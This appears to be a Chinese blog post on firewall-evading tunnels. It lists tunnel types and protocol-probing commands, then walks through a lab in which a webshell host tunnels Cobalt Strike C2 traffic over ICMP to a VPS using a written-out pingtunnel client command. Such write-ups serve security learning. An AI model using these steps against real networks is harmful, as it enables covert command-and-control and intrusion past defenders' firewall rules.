常用的隧道技术:
利用各种隧道技术,以网络防火墙允许的协议,
绕过网络防火墙的封锁,实现访问被封锁的目标网络
网络层:IPv6 隧道、ICMP 隧道
传输层:TCP 隧道、UDP 隧道、常规端口转发
应用层:SSH 隧道、HTTP/S 隧道、DNS 隧道
协议 判断命令
ICMP ping ip or domain
HTTP curl ip or domain
SSH ssh ip or domain
DNS nslookup domain
TCP telnet ip port
... ................
环境准备
本机作为攻击机,一台vps作为C2服务器,以及隧道服务端。
靶机使用一台云服务器,开启防火墙。
出站入站规则全部禁止,入站规则中添加web,允许访问80端口。
出站规则中允许ICMP
使用webshell连接web服务器。首先直接上传CS后门执行发现无法上线,之后信息收集,得到出网协议为ICMP。
隧道搭建
相关项目 https://github.com/esrrhs/pingtunnel
首先将工具上传至VPS启动服务端
./pingtunnel -type server
之后将工具通过webshell上传,在客户端启动
pingtunnel -type client -l :3333 -s x.x.x.x -t x.x.x.x:4444 -tcp 1 -noprint 1 -nolog 1
这条命令中,-l后的端口为本机端口,-s后为服务端IP,-t后为服务端地址以及端口。
之后连接成功后,服务端会有结果返回。
在CS中需要新建两个监听器,一个监听器监听本机的地址端口,需要使用这个监听器生成后门,之后上传运行。
因为流量为HTTP,经过隧道转发后到了VPS上服务端的相关端口上,所以监听对应的端口。
之后执行发现可以上线。
标签:domain,隧道,端口,pingtunnel,ICMP,内网,服务端 From: https://www.cnblogs.com/re8sd/p/18168172